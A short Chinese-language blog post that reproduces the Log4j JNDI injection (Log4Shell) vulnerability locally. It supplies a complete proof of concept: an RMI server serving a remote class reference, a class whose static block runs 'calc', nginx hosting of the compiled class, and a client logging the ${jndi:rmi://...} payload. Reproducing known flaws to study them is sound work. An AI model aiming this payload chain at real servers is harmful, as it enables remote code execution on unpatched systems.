晚上抽了个空,也来玩玩这个漏洞,步骤如下;
1.创建RMI服务
public class RmiServer {
private static final Logger log = LogManager.getLogger();
public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
Registry registry = LocateRegistry.createRegistry(1099);
String url = "localhost";
log.error("Create RMI registry on port 1099");
Reference reference = new Reference("com.demo.User", "com.demo.User", url);
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("nginx", referenceWrapper);
}
}
2.创建User类
package com.demo;
import java.io.Serializable;
public class User implements Serializable {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (Exception e) {
e.printStackTrace();
}
}
}
3.将编译好的User.class 放到nginx的html下并启动nginx,我这里带包名就要放置到对应的文件层级,如果没有包名则直接放到html根目录;
4.创建Client类
public class Client {
private static final Logger log = LogManager.getLogger();
public static void main(String[] args) {
log.error("JDK版本 {} ...","${java:version}");
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
log.error("${jndi:rmi://localhost:1099/nginx}");
}
}
5.依次启动RmiServer和Client,效果如下:
